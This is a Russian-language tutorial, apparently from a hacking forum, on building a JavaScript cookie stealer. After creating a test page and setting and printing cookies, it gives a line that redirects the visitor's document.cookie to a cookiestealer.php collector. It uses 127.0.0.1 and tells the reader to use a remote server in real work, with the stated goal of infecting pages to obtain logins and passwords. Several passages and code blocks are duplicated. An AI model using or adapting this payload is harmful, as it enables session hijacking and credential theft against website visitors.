JavaScript – один из самых распространенных языков, используемых в веб-программировании. Он скрывает в себе множество полезных возможностей для работы с сайтами, хотя некоторые их них не столь однозначны (например, сборщик куки, который мы будем использовать в этой статье).
Куки (cookies) – данные, запрашиваемые веб-сайтом в целях “запоминания” пользователя. Содержат в себе: время посещения сайта, устройство подключения, логины, пароли и прочую деликатную информацию – чтобы их заполучить, мы попробуем заразить исходный html-код страницы вредоносным javascript.
Для начала, создадим новую директорию, где будет ютиться наш html-файл:
И переместимся в неё командой
Оказавшись в директории, создадим файл "index.html" командой
Далее займемся его наполнением
Добавьте стандартные html-теги в документ:
Получится что-то вроде этого
Теперь сохраняйте документ сочетанием клавиш Ctrl+O. Если мы откроем этот файл в нашем браузере, увидим пустую страницу (это логично).
Код:
mkdir cookiestealer
Код:
cd cookiestealer
Код:
touch index.html
Далее займемся его наполнением
Код:
nano index.html
Код:
<html>
<body>
</body>
</html>
Теперь сохраняйте документ сочетанием клавиш Ctrl+O. Если мы откроем этот файл в нашем браузере, увидим пустую страницу (это логично).
Мы можем самостоятельно создать cookies добавив одну лишь строчку в нашу тестовую html-страницу:
В редакторе впишите эту строку между тегами “body” как указано на скриншоте:
Если Вы откроете веб-страницу еще раз после сохранения, внешне ничего не изменится, но “под капотом” уже появились наши cookies. Чтобы их посмотреть добавим в наш javascript команду вывода:
Наш скрипт теперь выглядит вот так:
Еще раз сохраните и откройте через браузер – теперь Вы видите наши самодельные cookies.
Не забудьте потом стереть команду “document.write(document.cookie);” из файла – мы же не хотим показывать cookie в дальнейшем.
Код:
<script type="text/javascript">
document.cookie = "username=Null Byte";
</script>
Если Вы откроете веб-страницу еще раз после сохранения, внешне ничего не изменится, но “под капотом” уже появились наши cookies. Чтобы их посмотреть добавим в наш javascript команду вывода:
Код:
document.write(document.cookie);
Еще раз сохраните и откройте через браузер – теперь Вы видите наши самодельные cookies.
Не забудьте потом стереть команду “document.write(document.cookie);” из файла – мы же не хотим показывать cookie в дальнейшем.
Используя JavaScript, перенаправим вывод куки на сервер для дальнейшего использования командой:
В примере я использую локальный адрес 127.0.0.1 – в настоящей работе Вы должны использовать адрес файла, расположенного на удаленном сервере.
Теперь Ваш html-файл должен выглядеть примерно вот так:
Этого вполне достаточно, чтобы перенаправить cookies в необходимое нам место.
Код:
document.location='http://127.0.0.1 /cookiestealer.php?
c='+document.cookie;
Теперь Ваш html-файл должен выглядеть примерно вот так:
Этого вполне достаточно, чтобы перенаправить cookies в необходимое нам место.